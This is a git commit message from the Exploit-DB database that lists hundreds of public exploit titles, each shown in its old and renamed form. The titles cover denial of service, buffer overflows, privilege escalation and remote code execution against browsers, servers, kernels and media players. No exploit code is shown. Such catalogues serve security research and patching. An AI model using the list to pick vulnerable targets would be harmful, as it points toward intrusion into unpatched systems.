From c66d2f584e455944a43953742a28f3c59fc6ea33 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 2 Nov 2017 05:01:28 +0000 Subject: [PATCH] DB: 2017-11-02 5 new exploits Microsoft Internet Explorer - DHTML Object Handling Vulnerabilities (MS05-020) Microsoft Internet Explorer - DHTML Object Handling (MS05-020) Stoney FTPd - Denial of Service (rxBot mods ftpd) Stoney FTPd - 'rxBot mods ftpd' Denial of Service Microsoft Windows Server 2000 - UPNP (getdevicelist) Memory Leak Denial of Service Microsoft Windows Server 2000 - UPNP 'getdevicelist' Memory Leak Denial of Service Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC) Winamp 5.21 - '.Midi' File Header Handling Buffer Overflow (PoC) Apache (mod_rewrite) < 1.3.37/2.0.59/2.2.3 - Remote Overflow (PoC) Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow (PoC) ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC) ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC) Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption Vulnerabilities Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption ZOO - .ZOO File Decompression Infinite Loop Denial of Service (PoC) Versalsoft HTTP File Uploader - ActiveX 6.36 (AddFile) Remote Denial of Service ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC) Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service RhinoSoft Serv-U FTP Server 7.3 - Authenticated 'stou con:1' Denial of Service CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash CUPS 1.3.7 - Cross-Site Request Forgery (Add RSS Subscription) Remote Crash Microsoft Office - Communicator (SIP) Remote Denial of Service Microsoft Office - Communicator 'SIP' Remote Denial of Service Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (Heap Spray) Apple Safari - 'ARGUMENTS' Array Integer Overflow HeapSpray (PoC) Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities Amaya Web Editor 11.0 - XML / HTML Parser VideoLAN VLC Media Player 0.9.8a - Web UI (input) Remote Denial of Service VideoLAN VLC Media Player 0.9.8a - Web UI 'input' Remote Denial of Service Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities Real Helix DNA - 'RTSP' / 'SETUP' Request Handler BugHunter HTTP Server 1.6.2 - 'httpsv.exe' (GET 404) Remote Denial of Service BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service httpdx 1.4 - HTTP Server Host Header Remote Format String Denial of Service Multiple Media Player - HTTP DataHandler Overflow (iTunes & QuickTime etc) Multiple Media Players ((iTunes / QuickTime) - HTTP DataHandler Overflow Microsoft Internet Explorer 6/7/8 - Denial of Service (Shockwave Flash Object) Microsoft Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service Adobe (Multiple Products) - XML External Entity / XML Injection Vulnerabilities Adobe (Multiple Products) - XML External Entity / XML Injection PHP (Multiple Functions) - Local Denial of Service Vulnerabilities PHP (Multiple Functions) - Local Denial of Service RPM Select/Elite 5.0 - '.xml config parsing' Unicode Buffer Overflow (PoC) RPM Select/Elite 5.0 - '.xml Configuration parsing' Unicode Buffer Overflow (PoC) Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow Oreans Themida 2.1.8.0 - '.TMD' File Handling Buffer Overflow Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service Play [EX] 2.1 - '.M3U'/'.PLS'/'.LST' Playlist File Denial of Service Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow) Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Qualcomm qpopper 2.53/3.0 / RedHat imap 4.5 -4_ UoW imap 4.5 popd - Lock File Denial of Service Qualcomm qpopper 2.53/3.0 / RedHat imap 4.5 -4 / UoW imap 4.5 popd - Lock File Denial of Service Axent NetProwler 3.0 - Malformed IP Packets Denial of Service (1) Axent NetProwler 3.0 - Malformed IP Packets Denial of Service (2) Axent NetProwler 3.0 - IP Packets Denial of Service (1) Axent NetProwler 3.0 - IP Packets Denial of Service (2) WFTPD 2.4.1RC11 - REST Command Malformed File Write Denial of Service WFTPD 2.4.1RC11 - 'REST' Malformed File Write Denial of Service id Software Quake 3 Arena Server 1.29 - Possible Buffer Overflow id Software Quake 3 Arena Server 1.29 - Buffer Overflow BSDI 3.0/3.1 - Possible Local Kernel Denial of Service BSDI 3.0/3.1 - Local Kernel Denial of Service Cisco IOS 11/12 - Malformed SNMP Message Denial of Service Cisco IOS 11/12 - SNMP Message Denial of Service Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service BitchX 1.0 - Malformed RPL_NAMREPLY Denial of Service BitchX 1.0 - 'RPL_NAMREPLY' Denial of Service RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC) RealPlayer 15.0.6.14(.3g2) - 'WriteAV' Crash (PoC) Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow ProFTPd 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun Avaya Argent Office - Malformed DNS Packet Denial of Service Avaya Argent Office - DNS Packet Denial of Service Cisco IOS 12 MSFC2 - Malformed Layer 2 Frame Denial of Service Cisco IOS 12 MSFC2 - Layer 2 Frame Denial of Service ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service Red-M Red-Alert 3.1 - Remote Vulnerabilities ClamAV Daemon 0.65 - UUEncoded Message Denial of Service Red-M Red-Alert 3.1 - Remote Exploit Neon WebDAV Client Library 0.2x - Format String Vulnerabilities Neon WebDAV Client Library 0.2x - Format String Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure Adobe Acrobat / Acrobat Reader 6.0 - ETD File Parser Format String Adobe Acrobat / Acrobat Reader 6.0 - '.ETD' File Parser Format String Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access Check Point VPN-1 SecureClient - IP Address Local Memory Access CenterICQ 4.20/4.5 - Malformed Packet Handling Remote Denial of Service CenterICQ 4.20/4.5 - Packet Handling Remote Denial of Service Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012) Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption (MS06-012) Mozilla (Multiple Products) - iFrame JavaScript Execution Vulnerabilities Mozilla (Multiple Products) - iFrame JavaScript Execution Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Apple Mac OSX 10.x - LZWDecodeVector (.tiff) Overflow Apple Mac OSX 10.x - LZWDecodeVector '.tiff' Overflow SolarWinds Server and Application Monitor - ActiveX (Pepco32c) Buffer Overflow SolarWinds Server and Application Monitor - ActiveX 'Pepco32c' Buffer Overflow Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service Vulnerabilities Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Microsoft Windows XP - GDI+ '.ICO' File Remote Denial of Service PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow Vulnerabilities PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow PC SOFT WinDEV 11 - '.WDP' File Parsing Stack Buffer Overflow Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities Multiple Platform IPv6 Address Publication - Denial of Service Ruby 1.9 - WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request Denial of Service Ruby 1.9 - 'WEBrick::HTTP::DefaultFileHandler' Crafted HTTP Request Denial of Service Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial of Service Apple Safari For Windows 3.2.1 - URI Remote Denial of Service Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial of Service Apple Safari 4 - 'feeds:' URI Null Pointer Dereference Remote Denial of Service Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption Microsoft Windows Media Player 11 - '.AVI' File Colorspace Conversion Remote Memory Corruption Apache 2.4.7 (mod_status) - Scoreboard Handling Race Condition Apache 2.4.7 mod_status - Scoreboard Handling Race Condition Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial of Service Battlefield 2/2142 - Packet Null Pointer Dereference Remote Denial of Service Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize) Foxit Products GIF Conversion - Memory Corruption (DataSubBlock) Foxit Products GIF Conversion - 'LZWMinimumCodeSize' Memory Corruption Foxit Products GIF Conversion - 'DataSubBlock' Memory Corruption Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize) Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize' Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.TTF' File Embedded in SWF Adobe Flash - Heap Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free Vulnerabilities PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free Wireshark - file_read (wtap_read_bytes_or_eof/mp2t_find_next_pcr) Stack Based Buffer Overflow Wireshark - memcpy (get_value / dissect_btatt) SIGSEGV Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow Wireshark - memcpy 'get_value / dissect_btatt' SIGSEGV Wireshark - addresses_equal (dissect_rsvp_common) Use-After-Free Wireshark - addresses_equal 'dissect_rsvp_common' Use-After-Free pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap Based Out-of-Bounds Read pdfium - opj_j2k_read_mcc (libopenjpeg) Heap Based Out-of-Bounds Read Wireshark - iseries_check_file_type Stack Based Out-of-Bounds Read pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read Wireshark - nettrace_3gpp_32_423_file_open Stack Based Out-of-Bounds Read Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Based Out-of-Bounds Read pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free pdfium - opj_t2_read_packet_header 'libopenjpeg' Heap Use-After-Free Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine) Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor (treo_attach) Nullpointer Dereference Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor 'treo_attach' Nullpointer Dereference Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Netwrix Auditor 7.1.322.0 - ActiveX 'sourceFile' Stack Buffer Overflow Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1 Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 2 Apple QuickTime < 7.7.79.80.95 - PSD File Parsing Memory Corruption Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (1) Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (2) Apple QuickTime < 7.7.79.80.95 - '.PSD' Parsing Memory Corruption Adobe Flash - Heap Overflow in ATF Processing (Image Reading) Adobe Flash - Heap Overflow in ATF Processing Image Reading Apache 2.4.23 (mod_http2) - Denial of Service Apache 2.4.23 mod_http2 - Denial of Service Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' WhatsApp 2.17.52 - Memory Corruption ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm) ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass Exploit IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit IBM DB2 - Universal Database 7.2 'db2licm' Local Exploit SuSE Linux 9.0 - YaST config Skribt Local Exploit SuSE Linux 9.0 - YaST Configuration Skribt Local Exploit Solaris locale - Format Strings (noexec stack) Exploit Solaris locale - Format Strings 'noexec stack' Exploit UUCP Exploit - File Creation/Overwriting (Symlinks) Exploit UUCP Exploit - File Creation/Overwriting Symlinks Exploit GnomeHack - Local Buffer Overflow (gid=games) Kwintv - Local Buffer Overflow (gid=video(33)) GnomeHack - Local Buffer Overflow Kwintv - Local Buffer Overflow RedHat 6.1 man - Local Exploit (egid 15) RedHat 6.1 man - 'egid 15' Local Exploit Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities Solaris 2.5.1 lp / lpsched - Symlink Exploit SGI IRIX - Multiple Buffer Overflows (LsD) SGI IRIX - 'LsD' Multiple Buffer Overflows Solaris 5.5.1 X11R6.3 - xterm (-xrm) Privilege Escalation Solaris 5.5.1 X11R6.3 - xterm '-xrm' Privilege Escalation ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit GlobalScape - CuteFTP macros (.mcr) Local GlobalScape - CuteFTP macros '.mcr' Local socat 1.4.0.2 - Local Format String (not setuid) Socat 1.4.0.2 - Not SETUID Local Format String TipxD 1.1.1 - Local Format String (not setuid) TipxD 1.1.1 - Not SETUID Local Format String GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID) VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) GNU a2ps - 'Anything to PostScript' Not SUID Local Exploit VisualBoyAdvanced 1.7.x - Non SUID Local Shell Exploit eXeem 0.21 - Local Password Disclosure (asm) eXeem 0.21 - Local Password Disclosure (ASM) Microsoft Excel 2000/2003 - Hlink Local Buffer Overflow (French) Microsoft Excel 2003 - Hlink Local Buffer Overflow (Italian) WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow (French) Microsoft Excel 2000/2003 (French) - Hlink Local Buffer Overflow Microsoft Excel 2003 (Italian) - Hlink Local Buffer Overflow WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow Microsoft PowerPoint 2003 SP2 - Local Code Execution (French) Microsoft PowerPoint 2003 SP2 (French) - Local Code Execution Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation (Root File Create) Xcode OpenBase 9.1.5 (OSX) - Root File Create Privilege Escalation Apple Mac OSX 10.4.8 - DiskManagement BOM (cron) Privilege Escalation Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Privilege Escalation ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit Send ICMP Nasty Garbage (SING) - Append File Logrotate Exploit Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password) Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (Change Sys Password) VUPlayer 2.49 - '.asx' (HREF) Universal Buffer Overflow VUPlayer 2.49 - '.asx' 'HREF' Universal Buffer Overflow VUPlayer 2.49 - '.asx' (Universal) Local Buffer Overflow VUPlayer 2.49 - '.asx' Universal Local Buffer Overflow Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (Universal) Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow Foxit Reader 3.0 (Build 1301) - PDF Buffer Overflow (Universal) Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target) Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow Rosoft Media Player 4.2.1 - Local Buffer Overflow Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500) Adobe Acrobat Reader - JBIG2 Universal Exploit Mini-stream Ripper 3.0.1.1 - '.asx' (HREF) Local Buffer Overflow Mini-stream Ripper 3.0.1.1 - '.asx' 'HREF' Local Buffer Overflow Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (update) Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2) BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities BSD (Multiple Distributions) - 'setusercontext()' Exploit Audacity 1.2 - '.gro' Universal Buffer Overflow (egg hunter) Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter) NetAccess IP3 - Authenticated (ping option) Command Injection NetAccess IP3 - Authenticated Ping Option Command Injection Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript '.eps' Buffer Overflow Jasc Paint Shop Pro 8 - Local Buffer Overflow (Universal) Jasc Paint Shop Pro 8 - Local Universal Buffer Overflow HTML Help Workshop 4.74 - hhp Buffer Overflow (Universal) HTML Help Workshop 4.74 - hhp Universal Buffer Overflow Audiotran 1.4.1 - Buffer Overflow (Direct RET) Audiotran 1.4.1 - Direct RET Buffer Overflow Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015) Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015) feedDemon 3.1.0.9 - opml File Buffer Overflow feedDemon 3.1.0.9 - '.opml' File Buffer Overflow Winamp 5.572 - Local Buffer Overflow (EIP + SEH DEP Bypass) Winamp 5.572 - Local Buffer Overflow (EIP + SEH) (DEP Bypass) GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH) GSM SIM Utility 5.15 - '.sms' File Local Buffer Overflow (SEH) GSM SIM Utility 5.15 - Local Exploit (Direct RET) GSM SIM Utility 5.15 - Direct RET Local Exploit Microsoft Windows - Automatic LNK Shortcut File Code Execution Microsoft Windows - Automatic .LNK Shortcut File Code Execution QQPlayer 2.3.696.400p1 - smi File Buffer Overflow QQPlayer 2.3.696.400p1 - '.smi' File Buffer Overflow Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067) Microsoft Excel - FEATHEADER Record Exploit (MS09-067) SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass) SnackAmp 3.1.3B - SMP Buffer Overflow (SEH) (DEP Bypass) MP3-Nator - Buffer Overflow (SEH DEP Bypass) MP3-Nator - Buffer Overflow (SEH) (DEP Bypass) VisiWave - VWR File Parsing Trusted Pointer (Metasploit) VisiWave - '.VWR' File Parsing Trusted Pointer (Metasploit) F-Secure (Multiple Products) - ActiveX Overwrite (SEH) (Heap Spray) F-Secure (Multiple Products) - ActiveX HeapSpray Overwrite (SEH) Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow Blade API Monitor - Unicode Bypass Serial Number Buffer Overflow SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE Exploit SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT Exploit SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Exploit SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Exploit Slackware Linux 3.4 - liloconfig-color Temporary file Slackware Linux 3.4 - makebootdisk Temporary file Slackware Linux 3.4 - 'liloconfig-color' Temporary file Slackware Linux 3.4 - 'makebootdisk' Temporary file Slackware Linux 3.4 - netconfig Temporary file Slackware Linux 3.4 - pkgtool Temporary file Slackware Linux 3.4 - 'netconfig' Temporary file Slackware Linux 3.4 - 'pkgtool' Temporary file IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation Vulnerabilities IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation Vulnerabilities IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage Vulnerabilities GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage Quinn - 'the Eskimo' and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Quinn - 'the Eskimo' and Peter N. Lewis Internet Configuration 1.0/2.0 Weak Password Encryption MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix - Registry Key Vulnerabilities MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch / RDS Fix - Registry Key Standard & Poors ComStock 4.2.4 - Machine Vulnerabilities Standard & Poors ComStock 4.2.4 - Exploit HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities HP-UX 10.20/11.0 - '.SNMPD' File Permission CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (Large Shellcode) CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) Samba 2.0.x - Insecure TMP file Symbolic Link Samba 2.0.x - Insecure TMP File Symbolic Link SuSE 7.0 - KFM Insecure TMP File Creation SuSE 7.0 - KFM Insecure '.TMP' File Creation QNX RTOS 4.25 - CRTTrap File Disclosure QNX RTOS 4.25 - 'CRTTrap' File Disclosure Linux Kernel 2.4 - SUID execve() System Call Race Condition Executable File Read (PoC) Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read (PoC) BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct RETN) Aviosoft Digital TV Player Professional 1.x - '.PLF' Exploit (Direct Retn) BlazeVideo HDTV Player 6.6 Professional - Direct RETN Exploit Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn Exploit BlazeDVD 6.1 - '.PLF' File Exploit (DEP + ASLR Bypass) (Metasploit) BlazeDVD 6.1 - '.PLF' File Exploit (ASLR + DEP Bypass) (Metasploit) Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1) Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2) Cscope 13.0/15.x - Insecure Temporary File Creation (1) Cscope 13.0/15.x - Insecure Temporary File Creation (2) Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - Local Ring Exploit (EPATHOBJ) Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring Exploit PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities PHP 5.0.5 - Safedir Restriction Bypass AudioCoder 0.8.22 - '.m3u' Buffer Overflow (Direct Retn) AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow AudioCoder 0.8.22 - '.lst' Buffer Overflow (Direct Retn) AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY) KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET) BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities Linux Kernel 2.4.x/2.5.x/2.6.x - 'Sockaddr_In.Sin_Zero' Kernel Memory Disclosure KingView 6.53 - Insecure ActiveX Control (SuperGrid) KingView 6.53 - 'SuperGrid' Insecure ActiveX Control Steinberg MyMp3PRO 5.0 - Buffer Overflow (SEH) (DEP Bypass with ROP) Steinberg MyMp3PRO 5.0 - Buffer Overflow (SEH) (DEP Bypass + ROP) BlazeDVD Pro Player 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET) BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RETBuffer Overflow Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation Linux 3.17 - noexec File Security Bypass (Python ctypes and memfd_create) Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass FireEye - Malware Input Processor (uid=mip) Privilege Escalation FireEye - Malware Input Processor Privilege Escalation Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098) VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH) Microsoft Windows XP/2000 - RPC Remote (Non Exec Memory) Exploit Microsoft Windows XP/2000 - RPC Remote Non Exec Memory Exploit ProFTPd 1.2.10 - Remote Users Enumeration Exploit ProFTPd 1.2.10 - Remote Users Enumeration Multiple Browsers - Tabbed Browsing Vulnerabilities Multiple Browsers - Tabbed Browsing Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit) Ability Server 2.34 (Unix) - FTP 'STOR' Buffer Overflow Webmin 1.5 - Web Brute Force (cgi-version) Webmin 1.5 - Web Brute Force (CGI) Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039) Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service Microsoft Windows Plug-and-Play Service (French) - Remote Universal Exploit (MS05-039) Battlefield (BFCC < 1.22_A /BFVCC < 2.14_B / BF2CC) - Authentication Bypass / Password Stealer / Denial of Service Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind) Lynx 2.8.6dev.13 - Remote Buffer Overflow Mercury Mail Transport System 4.01b - Remote Exploit (PH SERVER) Mercury Mail Transport System 4.01b - PH SERVER Remote Exploit SHOUTcast 1.9.4 - File Request Format String (Leaked) SHOUTcast 1.9.4 - File Request 'Leaked' Format String Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra) Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution MySQL 4.x/5.0 (Windows) - User-Defined Function (UDF) Command Execution MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution GNU Mailutils imap4d 0.6 - Remote Format String (exec-shield) GNU Mailutils imap4d 0.6 - exec-shield Remote Format String Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield) Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow HP Tru64 - Remote Secure Shell User Enumeration Exploit HP Tru64 - Remote Secure Shell User Enumeration Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow 2 Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2) Program Checker - 'sasatl.dll 1.5.0.531' JavaScript Heap Spraying Exploit Program Checker - 'sasatl.dll 1.5.0.531' JavaScript HeapSpray Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog Heap Spraying Exploit Program Checker - 'sasatl.dll 1.5.0.531' 